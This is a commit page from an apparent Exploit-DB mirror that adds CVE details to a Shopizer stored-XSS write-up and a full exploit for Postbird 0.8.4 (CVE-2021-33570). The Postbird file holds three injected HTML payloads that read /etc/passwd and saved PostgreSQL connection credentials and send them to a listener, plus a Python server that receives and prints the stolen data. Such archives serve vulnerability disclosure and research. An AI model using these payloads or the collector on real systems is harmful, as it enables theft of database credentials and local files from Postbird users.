bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-05-28

Browse source 
2 changes to exploits/shellcodes

Postbird 0.8.4 - Javascript Injection
This commit is contained in:
Offensive Security 2021-05-28 05:01:57 +00:00
parent aa3c54402b
commit b1cf12c4ea
3 changed files with 91 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
exploits/java/webapps/49901.txt
View file

@ -4,6 +4,7 @@
# Vendor Homepage: https://www.shopizer.com # Vendor Homepage: https://www.shopizer.com
# Software Link: https://github.com/shopizer-ecommerce/shopizer # Software Link: https://github.com/shopizer-ecommerce/shopizer
# Version: <= 2.16.0 # Version: <= 2.16.0
# CVE: CVE-2021-33561, CVE-2021-33562
Stored XSS - 'customer_name' Administration Stored XSS - 'customer_name' Administration
@ -16,6 +17,7 @@ Steps to reproduce:
3. Change customer name to <script>alert(1)</script> and save it 3. Change customer name to <script>alert(1)</script> and save it
4. Open "Customers" -> XSS payload will trigger 4. Open "Customers" -> XSS payload will trigger
Except "Customers" section, XSS will be executed in "Orders" (/admin/orders/list.html) and "Recent orders" (/admin/home.html)
Reflected XSS - 'ref' parameter Reflected XSS - 'ref' parameter

88
exploits/multiple/webapps/49910.py Executable file
View file

@ -0,0 +1,88 @@
# Exploit Title: Postbird 0.8.4 - Javascript Injection
# Date: [26 May 2021]
# Exploit Author: Debshubra Chakraborty
# Vendor Homepage: https://github.com/paxa/postbird
# Software Link: https://www.electronjs.org/apps/postbird
# Version: 0.8.4
# Tested on: Linux
# CVE : CVE-2021-33570
"""
XSS Payload
<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://127.0.0.1 :5555/?xss='+JSON.stringify(navigator.appVersion), true);xhttp.send();">
LFI Payload
<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'file:///etc/passwd', false);xhttp.send();var res = xhttp.response;xhttp.open('GET', 'http://127.0.0.1 :5555/?file='+JSON.stringify(res), true);xhttp.send();">
PostgreSQL Password Stealing Payload
<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://127.0.0.1 :5555/?credentials='+window.localStorage.savedConnections, true);xhttp.send();">
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
import urllib.parse
import re
hostName = '0.0.0.0'
serverPort = 5555
class MyServer(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
parse(urllib.parse.unquote(self.requestline))
def log_message(self, format, *args):
return
def parse(data):
expression = re.search('\S+=', data)
attr = expression.group()
if attr[2:len(attr)-1] == 'file':
data = data[12:len(data)-11]
data = data.rsplit('\\n')
print(f'\n[+] File received from LFI: \n\n')
for output in data:
print(output)
elif attr[2:len(attr)-1] == 'xss':
data = data[11:len(data)-10]
print(f'\n[+] Data exfiltration from Stored XSS: \n\n{data}')
elif attr[2:len(attr)-1] == 'credentials':
pos = re.search('{"\S+:', data)
data = data[pos.start():len(data)-11]
for i in range(2, len(data), 1):
if data[i] == '"':
pos = i
break
host = data[2:pos]
data = data[14:]
data = data.rsplit(',')
print(f'\n\n[+] The Database credentials received\n\nHost = {host}')
for output in data:
print(output)
else:
print(f'\n\n[-] Unknown header attribute found, atribute = {attr[2:len(attr)-1]}')
def main():
global hostName, serverPort
webServer = HTTPServer((hostName, serverPort), MyServer)
print("Server started http://%s:%s" % (hostName, serverPort))
try:
webServer.serve_forever()
except KeyboardInterrupt:
pass
webServer.server_close()
print("\nServer stopped.")
if __name__ == "__main__":
main()

1
files_exploits.csv
View file

@ -44073,3 +44073,4 @@ id,file,description,date,author,type,platform,port
49905,exploits/php/webapps/49905.txt,"WordPress Plugin Cookie Law Bar 1.2.1 - 'clb_bar_msg' Stored Cross-Site Scripting (XSS)",2021-05-25,"Mesut Cetin",webapps,php, 49905,exploits/php/webapps/49905.txt,"WordPress Plugin Cookie Law Bar 1.2.1 - 'clb_bar_msg' Stored Cross-Site Scripting (XSS)",2021-05-25,"Mesut Cetin",webapps,php,
49907,exploits/multiple/webapps/49907.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)",2021-05-26,"Ron Jost",webapps,multiple, 49907,exploits/multiple/webapps/49907.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)",2021-05-26,"Ron Jost",webapps,multiple,
49909,exploits/php/webapps/49909.py,"Pluck CMS 4.7.13 - File Upload Remote Code Execution (Authenticated)",2021-05-26,"Ron Jost",webapps,php, 49909,exploits/php/webapps/49909.py,"Pluck CMS 4.7.13 - File Upload Remote Code Execution (Authenticated)",2021-05-26,"Ron Jost",webapps,php,
49910,exploits/multiple/webapps/49910.py,"Postbird 0.8.4 - Javascript Injection",2021-05-27,"Debshubra Chakraborty",webapps,multiple,

Can't render this file because it is too large.